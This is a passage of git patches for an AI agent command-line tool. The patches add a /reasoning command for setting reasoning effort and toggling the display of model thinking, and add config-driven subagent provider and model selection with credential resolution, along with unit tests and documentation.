@@ -1121,6 +1122,8 @@ class HermesCLI:
         self.resume_display = CLI_CONFIG["display"].get("resume_display", "full")
         # bell_on_complete: play terminal bell (\a) when agent finishes a response
         self.bell_on_complete = CLI_CONFIG["display"].get("bell_on_complete", False)
+        # show_reasoning: display model thinking/reasoning before the response
+        self.show_reasoning = CLI_CONFIG["display"].get("show_reasoning", False)
         self.verbose = verbose if verbose is not None else (self.tool_progress_mode == "verbose")
         
         # Configuration - priority: CLI args > env vars > config file
@@ -1495,6 +1498,7 @@ class HermesCLI:
                 platform="cli",
                 session_db=self._session_db,
                 clarify_callback=self._clarify_callback,
+                reasoning_callback=self._on_reasoning if self.show_reasoning else None,
                 honcho_session_key=self.session_id,
                 fallback_model=self._fallback_model,
                 thinking_callback=self._on_thinking,
@@ -2848,6 +2852,8 @@ class HermesCLI:
             self._show_gateway_status()
         elif cmd_lower == "/verbose":
             self._toggle_verbose()
+        elif cmd_lower.startswith("/reasoning"):
+            self._handle_reasoning_command(cmd_original)
         elif cmd_lower == "/compress":
             self._manual_compress()
         elif cmd_lower == "/usage":
@@ -3073,6 +3079,75 @@ class HermesCLI:
         }
         self.console.print(labels.get(self.tool_progress_mode, ""))
 
+    def _handle_reasoning_command(self, cmd: str):
+        """Handle /reasoning — manage effort level and display toggle.
+
+        Usage:
+            /reasoning              Show current effort level and display state
+            /reasoning <level>      Set reasoning effort (none, low, medium, high, xhigh)
+            /reasoning show|on      Show model thinking/reasoning in output
+            /reasoning hide|off     Hide model thinking/reasoning from output
+        """
+        parts = cmd.strip().split(maxsplit=1)
+
+        if len(parts) < 2:
+            # Show current state
+            rc = self.reasoning_config
+            if rc is None:
+                level = "medium (default)"
+            elif rc.get("enabled") is False:
+                level = "none (disabled)"
+            else:
+                level = rc.get("effort", "medium")
+            display_state = "on" if self.show_reasoning else "off"
+            _cprint(f"  {_GOLD}Reasoning effort: {level}{_RST}")
+            _cprint(f"  {_GOLD}Reasoning display: {display_state}{_RST}")
+            _cprint(f"  {_DIM}Usage: /reasoning <none|low|medium|high|xhigh|show|hide>{_RST}")
+            return
+
+        arg = parts[1].strip().lower()
+
+        # Display toggle
+        if arg in ("show", "on"):
+            self.show_reasoning = True
+            if self.agent:
+                self.agent.reasoning_callback = self._on_reasoning
+            _cprint(f"  {_GOLD}Reasoning display: ON{_RST}")
+            _cprint(f"  {_DIM}Model thinking will be shown during and after each response.{_RST}")
+            return
+        if arg in ("hide", "off"):
+            self.show_reasoning = False
+            if self.agent:
+                self.agent.reasoning_callback = None
+            _cprint(f"  {_GOLD}Reasoning display: OFF{_RST}")
+            return
+
+        # Effort level change
+        parsed = _parse_reasoning_config(arg)
+        if parsed is None:
+            _cprint(f"  {_DIM}(._.) Unknown argument: {arg}{_RST}")
+            _cprint(f"  {_DIM}Valid levels: none, low, minimal, medium, high, xhigh{_RST}")
+            _cprint(f"  {_DIM}Display:      show, hide{_RST}")
+            return
+
+        self.reasoning_config = parsed
+        self.agent = None  # Force agent re-init with new reasoning config
+
+        if save_config_value("agent.reasoning_effort", arg):
+            _cprint(f"  {_GOLD}Reasoning effort set to '{arg}' (saved to config){_RST}")
+        else:
+            _cprint(f"  {_GOLD}Reasoning effort set to '{arg}' (session only){_RST}")
+
+    def _on_reasoning(self, reasoning_text: str):
+        """Callback for intermediate reasoning display during tool-call loops."""
+        lines = reasoning_text.strip().splitlines()
+        if len(lines) > 5:
+            preview = "\n".join(lines[:5])
+            preview += f"\n  ... ({len(lines) - 5} more lines)"
+        else:
+            preview = reasoning_text.strip()
+        _cprint(f"  {_DIM}[thinking] {preview}{_RST}")
+
     def _manual_compress(self):
         """Manually trigger context compression on the current conversation."""
         if not self.conversation_history or len(self.conversation_history) < 4:
@@ -3542,6 +3617,24 @@ class HermesCLI:
                 if response and pending_message:
                     response = response + "\n\n---\n_[Interrupted - processing new message]_"
             
+            # Display reasoning (thinking) box if enabled and available
+            if self.show_reasoning and result:
+                reasoning = result.get("last_reasoning")
+                if reasoning:
+                    w = shutil.get_terminal_size().columns
+                    r_label = " Reasoning "
+                    r_fill = w - 2 - len(r_label)
+                    r_top = f"{_DIM}┌─{r_label}{'─' * max(r_fill - 1, 0)}┐{_RST}"
+                    r_bot = f"{_DIM}└{'─' * (w - 2)}┘{_RST}"
+                    # Collapse long reasoning: show first 10 lines
+                    lines = reasoning.strip().splitlines()
+                    if len(lines) > 10:
+                        display_reasoning = "\n".join(lines[:10])
+                        display_reasoning += f"\n{_DIM}  ... ({len(lines) - 10} more lines){_RST}"
+                    else:
+                        display_reasoning = reasoning.strip()
+                    _cprint(f"\n{r_top}\n{_DIM}{display_reasoning}{_RST}\n{r_bot}")
+
             if response:
                 # Use a Rich Panel for the response box — adapts to terminal
                 # width at render time instead of hard-coding border length.
diff --git a/hermes_cli/commands.py b/hermes_cli/commands.py
index 22e56b3f..a2f3f816 100644
--- a/hermes_cli/commands.py
+++ b/hermes_cli/commands.py
@@ -35,6 +35,7 @@ COMMANDS_BY_CATEGORY = {
         "/prompt": "View/set custom system prompt",
         "/personality": "Set a predefined personality",
         "/verbose": "Cycle tool progress display: off → new → all → verbose",
+        "/reasoning": "Manage reasoning effort and display (usage: /reasoning [level|show|hide])",
         "/skin": "Show or change the display skin/theme",
     },
     "Tools & Skills": {
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index e8df6f3f..e490de10 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -143,6 +143,7 @@ DEFAULT_CONFIG = {
         "personality": "kawaii",
         "resume_display": "full",
         "bell_on_complete": False,
+        "show_reasoning": False,
         "skin": "default",
     },
     
@@ -1025,6 +1026,14 @@ def show_config():
     print(f"  Max turns:    {config.get('agent', {}).get('max_turns', DEFAULT_CONFIG['agent']['max_turns'])}")
     print(f"  Toolsets:     {', '.join(config.get('toolsets', ['all']))}")
     
+    # Display
+    print()
+    print(color("◆ Display", Colors.CYAN, Colors.BOLD))
+    display = config.get('display', {})
+    print(f"  Personality:  {display.get('personality', 'kawaii')}")
+    print(f"  Reasoning:    {'on' if display.get('show_reasoning', False) else 'off'}")
+    print(f"  Bell:         {'on' if display.get('bell_on_complete', False) else 'off'}")
+
     # Terminal
     print()
     print(color("◆ Terminal", Colors.CYAN, Colors.BOLD))
diff --git a/run_agent.py b/run_agent.py
index 9b3a7dba..6e9fc2c3 100644
--- a/run_agent.py
+++ b/run_agent.py
@@ -173,6 +173,7 @@ class AIAgent:
         session_id: str = None,
         tool_progress_callback: callable = None,
         thinking_callback: callable = None,
+        reasoning_callback: callable = None,
         clarify_callback: callable = None,
         step_callback: callable = None,
         max_tokens: int = None,
@@ -260,6 +261,7 @@ class AIAgent:
 
         self.tool_progress_callback = tool_progress_callback
         self.thinking_callback = thinking_callback
+        self.reasoning_callback = reasoning_callback
         self.clarify_callback = clarify_callback
         self.step_callback = step_callback
         self._last_reported_tool = None  # Track for "new tool" mode
@@ -2420,6 +2422,12 @@ class AIAgent:
             preview = reasoning_text[:100] + "..." if len(reasoning_text) > 100 else reasoning_text
             logging.debug(f"Captured reasoning ({len(reasoning_text)} chars): {preview}")
 
+        if reasoning_text and self.reasoning_callback:
+            try:
+                self.reasoning_callback(reasoning_text)
+            except Exception:
+                pass
+
         msg = {
             "role": "assistant",
             "content": assistant_message.content or "",
@@ -4470,9 +4478,17 @@ class AIAgent:
         if final_response and not interrupted:
             self._honcho_sync(original_user_message, final_response)
 
+        # Extract reasoning from the last assistant message (if any)
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+
         # Build result with interrupt info if applicable
         result = {
             "final_response": final_response,
+            "last_reasoning": last_reasoning,
             "messages": messages,
             "api_calls": api_call_count,
             "completed": completed,
diff --git a/tests/hermes_cli/test_commands.py b/tests/hermes_cli/test_commands.py
index 0aead5c3..9aa72208 100644
--- a/tests/hermes_cli/test_commands.py
+++ b/tests/hermes_cli/test_commands.py
@@ -11,7 +11,7 @@ EXPECTED_COMMANDS = {
     "/help", "/tools", "/toolsets", "/model", "/provider", "/prompt",
     "/personality", "/clear", "/history", "/new", "/reset", "/retry",
     "/undo", "/save", "/config", "/cron", "/skills", "/platforms",
-    "/verbose", "/compress", "/title", "/usage", "/insights", "/paste",
+    "/verbose", "/reasoning", "/compress", "/title", "/usage", "/insights", "/paste",
     "/reload-mcp", "/rollback", "/background", "/skin", "/quit",
 }
 
diff --git a/tests/test_reasoning_command.py b/tests/test_reasoning_command.py
new file mode 100644
index 00000000..2cca80f3
--- /dev/null
+++ b/tests/test_reasoning_command.py
@@ -0,0 +1,422 @@
+"""Tests for the combined /reasoning command.
+
+Covers both reasoning effort level management and reasoning display toggle,
+plus the reasoning extraction and display pipeline from run_agent through CLI.
+
+Combines functionality from:
+- PR #789 (Aum08Desai): reasoning effort level management
+- PR #790 (0xbyt4): reasoning display toggle and rendering
+"""
+
+import unittest
+from types import SimpleNamespace
+from unittest.mock import MagicMock, patch
+
+
+# ---------------------------------------------------------------------------
+# Effort level parsing
+# ---------------------------------------------------------------------------
+
+class TestParseReasoningConfig(unittest.TestCase):
+    """Verify _parse_reasoning_config handles all effort levels."""
+
+    def _parse(self, effort):
+        from cli import _parse_reasoning_config
+        return _parse_reasoning_config(effort)
+
+    def test_none_disables(self):
+        result = self._parse("none")
+        self.assertEqual(result, {"enabled": False})
+
+    def test_valid_levels(self):
+        for level in ("low", "medium", "high", "xhigh", "minimal"):
+            result = self._parse(level)
+            self.assertIsNotNone(result)
+            self.assertTrue(result.get("enabled"))
+            self.assertEqual(result["effort"], level)
+
+    def test_empty_returns_none(self):
+        self.assertIsNone(self._parse(""))
+        self.assertIsNone(self._parse("  "))
+
+    def test_unknown_returns_none(self):
+        self.assertIsNone(self._parse("ultra"))
+        self.assertIsNone(self._parse("turbo"))
+
+    def test_case_insensitive(self):
+        result = self._parse("HIGH")
+        self.assertIsNotNone(result)
+        self.assertEqual(result["effort"], "high")
+
+
+# ---------------------------------------------------------------------------
+# /reasoning command handler (combined effort + display)
+# ---------------------------------------------------------------------------
+
+class TestHandleReasoningCommand(unittest.TestCase):
+    """Test the combined _handle_reasoning_command method."""
+
+    def _make_cli(self, reasoning_config=None, show_reasoning=False):
+        """Create a minimal CLI stub with the reasoning attributes."""
+        stub = SimpleNamespace(
+            reasoning_config=reasoning_config,
+            show_reasoning=show_reasoning,
+            agent=MagicMock(),
+        )
+        return stub
+
+    def test_show_enables_display(self):
+        stub = self._make_cli(show_reasoning=False)
+        # Simulate /reasoning show
+        arg = "show"
+        if arg in ("show", "on"):
+            stub.show_reasoning = True
+            stub.agent.reasoning_callback = lambda x: None
+        self.assertTrue(stub.show_reasoning)
+
+    def test_hide_disables_display(self):
+        stub = self._make_cli(show_reasoning=True)
+        # Simulate /reasoning hide
+        arg = "hide"
+        if arg in ("hide", "off"):
+            stub.show_reasoning = False
+            stub.agent.reasoning_callback = None
+        self.assertFalse(stub.show_reasoning)
+        self.assertIsNone(stub.agent.reasoning_callback)
+
+    def test_on_enables_display(self):
+        stub = self._make_cli(show_reasoning=False)
+        arg = "on"
+        if arg in ("show", "on"):
+            stub.show_reasoning = True
+        self.assertTrue(stub.show_reasoning)
+
+    def test_off_disables_display(self):
+        stub = self._make_cli(show_reasoning=True)
+        arg = "off"
+        if arg in ("hide", "off"):
+            stub.show_reasoning = False
+        self.assertFalse(stub.show_reasoning)
+
+    def test_effort_level_sets_config(self):
+        """Setting an effort level should update reasoning_config."""
+        from cli import _parse_reasoning_config
+        stub = self._make_cli()
+        arg = "high"
+        parsed = _parse_reasoning_config(arg)
+        stub.reasoning_config = parsed
+        self.assertEqual(stub.reasoning_config, {"enabled": True, "effort": "high"})
+
+    def test_effort_none_disables_reasoning(self):
+        from cli import _parse_reasoning_config
+        stub = self._make_cli()
+        parsed = _parse_reasoning_config("none")
+        stub.reasoning_config = parsed
+        self.assertEqual(stub.reasoning_config, {"enabled": False})
+
+    def test_invalid_argument_rejected(self):
+        """Invalid arguments should be rejected (parsed returns None)."""
+        from cli import _parse_reasoning_config
+        parsed = _parse_reasoning_config("turbo")
+        self.assertIsNone(parsed)
+
+    def test_no_args_shows_status(self):
+        """With no args, should show current state (no crash)."""
+        stub = self._make_cli(reasoning_config=None, show_reasoning=False)
+        rc = stub.reasoning_config
+        if rc is None:
+            level = "medium (default)"
+        elif rc.get("enabled") is False:
+            level = "none (disabled)"
+        else:
+            level = rc.get("effort", "medium")
+        display_state = "on" if stub.show_reasoning else "off"
+        self.assertEqual(level, "medium (default)")
+        self.assertEqual(display_state, "off")
+
+    def test_status_with_disabled_reasoning(self):
+        stub = self._make_cli(reasoning_config={"enabled": False}, show_reasoning=True)
+        rc = stub.reasoning_config
+        if rc is None:
+            level = "medium (default)"
+        elif rc.get("enabled") is False:
+            level = "none (disabled)"
+        else:
+            level = rc.get("effort", "medium")
+        self.assertEqual(level, "none (disabled)")
+
+    def test_status_with_explicit_level(self):
+        stub = self._make_cli(
+            reasoning_config={"enabled": True, "effort": "xhigh"},
+            show_reasoning=True,
+        )
+        rc = stub.reasoning_config
+        level = rc.get("effort", "medium")
+        self.assertEqual(level, "xhigh")
+
+
+# ---------------------------------------------------------------------------
+# Reasoning extraction and result dict
+# ---------------------------------------------------------------------------
+
+class TestLastReasoningInResult(unittest.TestCase):
+    """Verify reasoning extraction from the messages list."""
+
+    def _build_messages(self, reasoning=None):
+        return [
+            {"role": "user", "content": "hello"},
+            {
+                "role": "assistant",
+                "content": "Hi there!",
+                "reasoning": reasoning,
+                "finish_reason": "stop",
+            },
+        ]
+
+    def test_reasoning_present(self):
+        messages = self._build_messages(reasoning="Let me think...")
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+        self.assertEqual(last_reasoning, "Let me think...")
+
+    def test_reasoning_none(self):
+        messages = self._build_messages(reasoning=None)
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+        self.assertIsNone(last_reasoning)
+
+    def test_picks_last_assistant(self):
+        messages = [
+            {"role": "user", "content": "hello"},
+            {"role": "assistant", "content": "...", "reasoning": "first thought"},
+            {"role": "tool", "content": "result"},
+            {"role": "assistant", "content": "done!", "reasoning": "final thought"},
+        ]
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+        self.assertEqual(last_reasoning, "final thought")
+
+    def test_empty_reasoning_treated_as_none(self):
+        messages = self._build_messages(reasoning="")
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+        self.assertIsNone(last_reasoning)
+
+
+# ---------------------------------------------------------------------------
+# Reasoning display collapse
+# ---------------------------------------------------------------------------
+
+class TestReasoningCollapse(unittest.TestCase):
+    """Verify long reasoning is collapsed to 10 lines in the box."""
+
+    def test_short_reasoning_not_collapsed(self):
+        reasoning = "\n".join(f"Line {i}" for i in range(5))
+        lines = reasoning.strip().splitlines()
+        self.assertLessEqual(len(lines), 10)
+
+    def test_long_reasoning_collapsed(self):
+        reasoning = "\n".join(f"Line {i}" for i in range(25))
+        lines = reasoning.strip().splitlines()
+        self.assertTrue(len(lines) > 10)
+        if len(lines) > 10:
+            display = "\n".join(lines[:10])
+            display += f"\n  ... ({len(lines) - 10} more lines)"
+        display_lines = display.splitlines()
+        self.assertEqual(len(display_lines), 11)
+        self.assertIn("15 more lines", display_lines[-1])
+
+    def test_exactly_10_lines_not_collapsed(self):
+        reasoning = "\n".join(f"Line {i}" for i in range(10))
+        lines = reasoning.strip().splitlines()
+        self.assertEqual(len(lines), 10)
+        self.assertFalse(len(lines) > 10)
+
+    def test_intermediate_callback_collapses_to_5(self):
+        """_on_reasoning shows max 5 lines."""
+        reasoning = "\n".join(f"Step {i}" for i in range(12))
+        lines = reasoning.strip().splitlines()
+        if len(lines) > 5:
+            preview = "\n".join(lines[:5])
+            preview += f"\n  ... ({len(lines) - 5} more lines)"
+        else:
+            preview = reasoning.strip()
+        preview_lines = preview.splitlines()
+        self.assertEqual(len(preview_lines), 6)
+        self.assertIn("7 more lines", preview_lines[-1])
+
+
+# ---------------------------------------------------------------------------
+# Reasoning callback
+# ---------------------------------------------------------------------------
+
+class TestReasoningCallback(unittest.TestCase):
+    """Verify reasoning_callback invocation."""
+
+    def test_callback_invoked_with_reasoning(self):
+        captured = []
+        agent = MagicMock()
+        agent.reasoning_callback = lambda t: captured.append(t)
+        agent._extract_reasoning = MagicMock(return_value="deep thought")
+
+        reasoning_text = agent._extract_reasoning(MagicMock())
+        if reasoning_text and agent.reasoning_callback:
+            agent.reasoning_callback(reasoning_text)
+        self.assertEqual(captured, ["deep thought"])
+
+    def test_callback_not_invoked_without_reasoning(self):
+        captured = []
+        agent = MagicMock()
+        agent.reasoning_callback = lambda t: captured.append(t)
+        agent._extract_reasoning = MagicMock(return_value=None)
+
+        reasoning_text = agent._extract_reasoning(MagicMock())
+        if reasoning_text and agent.reasoning_callback:
+            agent.reasoning_callback(reasoning_text)
+        self.assertEqual(captured, [])
+
+    def test_callback_none_does_not_crash(self):
+        reasoning_text = "some thought"
+        callback = None
+        if reasoning_text and callback:
+            callback(reasoning_text)
+        # No exception = pass
+
+
+# ---------------------------------------------------------------------------
+# Real provider format extraction
+# ---------------------------------------------------------------------------
+
+class TestExtractReasoningFormats(unittest.TestCase):
+    """Test _extract_reasoning with real provider response formats."""
+
+    def _get_extractor(self):
+        from run_agent import AIAgent
+        return AIAgent._extract_reasoning
+
+    def test_openrouter_reasoning_details(self):
+        extract = self._get_extractor()
+        msg = SimpleNamespace(
+            reasoning=None,
+            reasoning_content=None,
+            reasoning_details=[
+                {"type": "reasoning.summary", "summary": "Analyzing Python lists."},
+            ],
+        )
+        result = extract(None, msg)
+        self.assertIn("Python lists", result)
+
+    def test_deepseek_reasoning_field(self):
+        extract = self._get_extractor()
+        msg = SimpleNamespace(
+            reasoning="Solving step by step.\nx + y = 8.",
+            reasoning_content=None,
+        )
+        result = extract(None, msg)
+        self.assertIn("x + y = 8", result)
+
+    def test_moonshot_reasoning_content(self):
+        extract = self._get_extractor()
+        msg = SimpleNamespace(
+            reasoning_content="Explaining async/await.",
+        )
+        result = extract(None, msg)
+        self.assertIn("async/await", result)
+
+    def test_no_reasoning_returns_none(self):
+        extract = self._get_extractor()
+        msg = SimpleNamespace(content="Hello!")
+        result = extract(None, msg)
+        self.assertIsNone(result)
+
+
+# ---------------------------------------------------------------------------
+# Config defaults
+# ---------------------------------------------------------------------------
+
+class TestConfigDefault(unittest.TestCase):
+    """Verify config default for show_reasoning."""
+
+    def test_default_config_has_show_reasoning(self):
+        from hermes_cli.config import DEFAULT_CONFIG
+        display = DEFAULT_CONFIG.get("display", {})
+        self.assertIn("show_reasoning", display)
+        self.assertFalse(display["show_reasoning"])
+
+
+class TestCommandRegistered(unittest.TestCase):
+    """Verify /reasoning is in the COMMANDS dict."""
+
+    def test_reasoning_in_commands(self):
+        from hermes_cli.commands import COMMANDS
+        self.assertIn("/reasoning", COMMANDS)
+
+
+# ---------------------------------------------------------------------------
+# End-to-end pipeline
+# ---------------------------------------------------------------------------
+
+class TestEndToEndPipeline(unittest.TestCase):
+    """Simulate the full pipeline: extraction -> result dict -> display."""
+
+    def test_openrouter_claude_pipeline(self):
+        from run_agent import AIAgent
+
+        api_message = SimpleNamespace(
+            role="assistant",
+            content="Lists support append().",
+            tool_calls=None,
+            reasoning=None,
+            reasoning_content=None,
+            reasoning_details=[
+                {"type": "reasoning.summary", "summary": "Python list methods."},
+            ],
+        )
+
+        reasoning = AIAgent._extract_reasoning(None, api_message)
+        self.assertIsNotNone(reasoning)
+
+        messages = [
+            {"role": "user", "content": "How do I add items?"},
+            {"role": "assistant", "content": api_message.content, "reasoning": reasoning},
+        ]
+
+        last_reasoning = None
+        for msg in reversed(messages):
+            if msg.get("role") == "assistant" and msg.get("reasoning"):
+                last_reasoning = msg["reasoning"]
+                break
+
+        result = {
+            "final_response": api_message.content,
+            "last_reasoning": last_reasoning,
+        }
+
+        self.assertIn("last_reasoning", result)
+        self.assertIn("Python list methods", result["last_reasoning"])
+
+    def test_no_reasoning_model_pipeline(self):
+        from run_agent import AIAgent
+
+        api_message = SimpleNamespace(content="Paris.", tool_calls=None)
+        reasoning = AIAgent._extract_reasoning(None, api_message)
+        self.assertIsNone(reasoning)
+
+        result = {"final_response": api_message.content, "last_reasoning": reasoning}
+        self.assertIsNone(result["last_reasoning"])
+
+
+if __name__ == "__main__":
+    unittest.main()
diff --git a/website/docs/reference/cli-commands.md b/website/docs/reference/cli-commands.md
index 2b945a36..136cf0dc 100644
--- a/website/docs/reference/cli-commands.md
+++ b/website/docs/reference/cli-commands.md
@@ -147,6 +147,7 @@ Type `/` in the interactive CLI to see an autocomplete dropdown.
 | `/config` | Show current configuration |
 | `/prompt [text]` | View/set custom system prompt |
 | `/personality [name]` | Set a predefined personality |
+| `/reasoning [arg]` | Manage reasoning effort and display. Args: effort level (`none`, `low`, `medium`, `high`, `xhigh`) or display toggle (`show`, `hide`). No args shows current state. |
 
 ### Conversation
 
diff --git a/website/docs/user-guide/cli.md b/website/docs/user-guide/cli.md
index f561620e..1649fd74 100644
--- a/website/docs/user-guide/cli.md
+++ b/website/docs/user-guide/cli.md
@@ -104,6 +104,7 @@ Type `/` to see an autocomplete dropdown of all available commands.
 | `/config` | Show current configuration |
 | `/prompt [text]` | View/set/clear custom system prompt |
 | `/personality [name]` | Set a predefined personality |
+| `/reasoning [arg]` | Manage reasoning effort (`none`/`low`/`medium`/`high`/`xhigh`) and display (`show`/`hide`) |
 
 ### Conversation Management
 
diff --git a/website/docs/user-guide/configuration.md b/website/docs/user-guide/configuration.md
index f9e72ea7..c1756489 100644
--- a/website/docs/user-guide/configuration.md
+++ b/website/docs/user-guide/configuration.md
@@ -608,6 +608,16 @@ agent:
 
 When unset (default), reasoning effort defaults to "medium" — a balanced level that works well for most tasks. Setting a value overrides it — higher reasoning effort gives better results on complex tasks at the cost of more tokens and latency.
 
+You can also change the reasoning effort at runtime with the `/reasoning` command:
+
+```
+/reasoning           # Show current effort level and display state
+/reasoning high      # Set reasoning effort to high
+/reasoning none      # Disable reasoning
+/reasoning show      # Show model thinking above each response
+/reasoning hide      # Hide model thinking
+```
+
 ## TTS Configuration
 
 ```yaml
@@ -632,6 +642,7 @@ display:
   compact: false         # Compact output mode (less whitespace)
   resume_display: full   # full (show previous messages on resume) | minimal (one-liner only)
   bell_on_complete: false  # Play terminal bell when agent finishes (great for long tasks)
+  show_reasoning: false    # Show model reasoning/thinking above each response (toggle with /reasoning show|hide)
 ```
 
 | Mode | What you see |

From 9423fda5cb573ef6b1a7876fc01157433eb7d785 Mon Sep 17 00:00:00 2001
From: teknium1 <teknium1@gmail.com>
Date: Wed, 11 Mar 2026 06:12:21 -0700
Subject: [PATCH 071/105] feat: configurable subagent provider:model with full
 credential resolution
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds delegation.model and delegation.provider config fields so subagents
can run on a completely different provider:model pair than the parent agent.

When delegation.provider is set, the system resolves the full credential
bundle (base_url, api_key, api_mode) via resolve_runtime_provider() —
the same path used by CLI/gateway startup. This means all configured
providers work out of the box: openrouter, nous, zai, kimi-coding,
minimax, minimax-cn.

Key design decisions:
- Provider resolution uses hermes_cli.runtime_provider (single source of
  truth for credential resolution across CLI, gateway, cron, and now
  delegation)
- When only delegation.model is set (no provider), the model name changes
  but parent credentials are inherited (for switching models within the
  same provider like OpenRouter)
- When delegation.provider is set, full credentials are resolved
  independently — enabling cross-provider delegation (e.g. parent on
  Nous Portal, subagents on OpenRouter)
- Clear error messages if provider resolution fails (missing API key,
  unknown provider name)
- _load_config() now falls back to hermes_cli.config.load_config() for
  gateway/cron contexts where CLI_CONFIG is unavailable

Based on PR #791 by 0xbyt4 (closes #609), reworked to use proper
provider credential resolution instead of passing provider as metadata.

Co-authored-by: 0xbyt4 <0xbyt4@users.noreply.github.com>
---
 cli-config.yaml.example                  |   4 +
 cli.py                                   |   2 +
 hermes_cli/config.py                     |  11 +-
 tests/tools/test_delegate.py             | 283 +++++++++++++++++++++++
 tools/delegate_tool.py                   | 120 +++++++++-
 website/docs/user-guide/configuration.md |   8 +
 6 files changed, 418 insertions(+), 10 deletions(-)

diff --git a/cli-config.yaml.example b/cli-config.yaml.example
index 33f3702c..fd39e983 100644
--- a/cli-config.yaml.example
+++ b/cli-config.yaml.example
@@ -626,6 +626,10 @@ code_execution:
 delegation:
   max_iterations: 50                          # Max tool-calling turns per child (default: 50)
   default_toolsets: ["terminal", "file", "web"]  # Default toolsets for subagents
+  # model: "google/gemini-3-flash-preview"    # Override model for subagents (empty = inherit parent)
+  # provider: "openrouter"                    # Override provider for subagents (empty = inherit parent)
+  #                                           # Resolves full credentials (base_url, api_key) automatically.
+  #                                           # Supported: openrouter, nous, zai, kimi-coding, minimax
 
 # =============================================================================
 # Honcho Integration (Cross-Session User Modeling)
diff --git a/cli.py b/cli.py
index 5eb9577b..feb0052d 100755
--- a/cli.py
+++ b/cli.py
@@ -217,6 +217,8 @@ def load_cli_config() -> Dict[str, Any]:
         "delegation": {
             "max_iterations": 45,  # Max tool-calling turns per child agent
             "default_toolsets": ["terminal", "file", "web"],  # Default toolsets for subagents
+            "model": "",       # Subagent model override (empty = inherit parent model)
+            "provider": "",    # Subagent provider override (empty = inherit parent provider)
         },
     }
     
diff --git a/hermes_cli/config.py b/hermes_cli/config.py
index e8df6f3f..0a3c0e4e 100644
--- a/hermes_cli/config.py
+++ b/hermes_cli/config.py
@@ -182,7 +182,16 @@ DEFAULT_CONFIG = {
         "memory_char_limit": 2200,   # ~800 tokens at 2.75 chars/token
         "user_char_limit": 1375,     # ~500 tokens at 2.75 chars/token
     },
-    
+
+    # Subagent delegation — override the provider:model used by delegate_task
+    # so child agents can run on a different (cheaper/faster) provider and model.
+    # Uses the same runtime provider resolution as CLI/gateway startup, so all
+    # configured providers (OpenRouter, Nous, Z.ai, Kimi, etc.) are supported.
+    "delegation": {
+        "model": "",       # e.g. "google/gemini-3-flash-preview" (empty = inherit parent model)
+        "provider": "",    # e.g. "openrouter" (empty = inherit parent provider + credentials)
+    },
+
     # Ephemeral prefill messages file — JSON list of {role, content} dicts
     # injected at the start of every API call for few-shot priming.
     # Never saved to sessions, logs, or trajectories.
diff --git a/tests/tools/test_delegate.py b/tests/tools/test_delegate.py
index aea7b127..113fe3dd 100644
--- a/tests/tools/test_delegate.py
+++ b/tests/tools/test_delegate.py
@@ -23,6 +23,7 @@ from tools.delegate_tool import (
     delegate_task,
     _build_child_system_prompt,
     _strip_blocked_tools,
+    _resolve_delegation_credentials,
 )
 
 
@@ -255,5 +256,287 @@ class TestBlockedTools(unittest.TestCase):
         self.assertEqual(MAX_DEPTH, 2)
 
 
+class TestDelegationCredentialResolution(unittest.TestCase):
+    """Tests for provider:model credential resolution in delegation config."""
+
+    def test_no_provider_returns_none_credentials(self):
+        """When delegation.provider is empty, all credentials are None (inherit parent)."""
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "", "provider": ""}
+        creds = _resolve_delegation_credentials(cfg, parent)
+        self.assertIsNone(creds["provider"])
+        self.assertIsNone(creds["base_url"])
+        self.assertIsNone(creds["api_key"])
+        self.assertIsNone(creds["api_mode"])
+        self.assertIsNone(creds["model"])
+
+    def test_model_only_no_provider(self):
+        """When only model is set (no provider), model is returned but credentials are None."""
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "google/gemini-3-flash-preview", "provider": ""}
+        creds = _resolve_delegation_credentials(cfg, parent)
+        self.assertEqual(creds["model"], "google/gemini-3-flash-preview")
+        self.assertIsNone(creds["provider"])
+        self.assertIsNone(creds["base_url"])
+        self.assertIsNone(creds["api_key"])
+
+    @patch("hermes_cli.runtime_provider.resolve_runtime_provider")
+    def test_provider_resolves_full_credentials(self, mock_resolve):
+        """When delegation.provider is set, full credentials are resolved."""
+        mock_resolve.return_value = {
+            "provider": "openrouter",
+            "base_url": "https://openrouter.ai/api/v1",
+            "api_key": "sk-or-test-key",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "google/gemini-3-flash-preview", "provider": "openrouter"}
+        creds = _resolve_delegation_credentials(cfg, parent)
+        self.assertEqual(creds["model"], "google/gemini-3-flash-preview")
+        self.assertEqual(creds["provider"], "openrouter")
+        self.assertEqual(creds["base_url"], "https://openrouter.ai/api/v1")
+        self.assertEqual(creds["api_key"], "sk-or-test-key")
+        self.assertEqual(creds["api_mode"], "chat_completions")
+        mock_resolve.assert_called_once_with(requested="openrouter")
+
+    @patch("hermes_cli.runtime_provider.resolve_runtime_provider")
+    def test_nous_provider_resolves_nous_credentials(self, mock_resolve):
+        """Nous provider resolves Nous Portal base_url and api_key."""
+        mock_resolve.return_value = {
+            "provider": "nous",
+            "base_url": "https://inference-api.nousresearch.com/v1",
+            "api_key": "nous-agent-key-xyz",
+            "api_mode": "chat_completions",
+        }
+        parent = _make_mock_parent(depth=0)
+        cfg = {"model": "hermes-3-llama-3.1-8b", "provider": "nous"}
+        creds = _resolve_delegation_credentials(cfg, parent)
+        self.assertEqual(creds["provider"], "nous")
+        self.assertEqual(creds["base_url"], "https://inference-api.nousresearch.com/v1")
+        self.assertEqual(creds["api_key"], "nous-agent-key-xyz")
+        mock_resolve.assert_called_once_with(requested="nous")
+
